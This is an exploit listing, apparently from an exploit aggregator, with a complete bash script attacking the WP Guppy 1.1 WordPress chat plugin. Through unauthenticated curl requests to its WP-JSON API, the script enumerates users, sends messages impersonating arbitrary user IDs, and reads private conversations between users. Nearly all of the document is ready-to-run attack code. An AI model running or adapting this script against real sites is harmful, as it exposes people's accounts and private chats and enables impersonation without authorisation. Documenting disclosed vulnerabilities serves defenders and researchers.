Exploit for WordPress WP Guppy 1.1 Information Disclosure

Name: Exploit for WordPress WP Guppy 1.1 Information Disclosure
Rating: 5 (274 reviews)
2021-11-23 | CVSS 7.1
## https://sploitus.com/exploit?id=PACKETSTORM:165054
# Exploit Title: Wordpress Plugin WP Guppy 1.1 - WP-JSON API Sensitive Information Disclosure  
# Exploit Author: Keyvan Hardani  
# Date: 22/11/2021  
# Vendor Homepage: https://wp-guppy.com/  
# Version: up to 1.1  
# Tested on: Kali Linux - Windows 10 - Wordpress 5.8.x and apache2  
# Usage ./exploit.sh -h  
  
#!/bin/bash  
  
Help()  
{  
# Display Help  
echo "Usage"  
echo  
echo "Wordpress Plugin WP Guppy - A live chat - WP_JSON API Sensitive Information Disclosure"  
echo  
echo "Option 1: Get all users ( ./exploit.sh 1 domain.com)"  
echo "Option 2: Send message from / to other users ( ./exploit.sh 2 domain.com 1493 1507 ) => Senderid=1493 & Receiverid=1507"  
echo "Option 3: Get the chats between users ( ./exploit.sh 3 domain.com 1507 1493) => Receiverid=1493 & Userid= 1493"  
echo "-h Print this Help."  
echo  
}  
  
while getopts ":h" option; do  
case $option in  
h) # display Help  
Help  
exit;;  
esac  
done  
  
if [ $1 == 1 ]  
then  
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-users?userId=1&offset=0&search=" | python -m json.tool  
fi  
  
if [ $1 == 2 ]  
then  
curl -s -X POST --url "https://$2/wp-json/guppy/v2/send-guppy-message" --data '{"receiverId":"'$3'","userId":"'$4'","guppyGroupId":"","chatType":1,"message":"test","replyTo":"","latitude":"","longitude":"","messageType":0,"messageStatus":0,"replyId":"","timeStamp":1637583213,"messageSentTime":"November 22, 2021","metaData":{"randNum":5394},"isSender":true}' -H 'Content-Type: application/json'| python -m json.tool  
fi  
if [ $1 == 3 ]  
then  
curl -s --url "https://$2/wp-json/guppy/v2/load-guppy-user-chat?offset=0&receiverId=$3&userId=$4&chatType=1" | python -m json.tool  
fi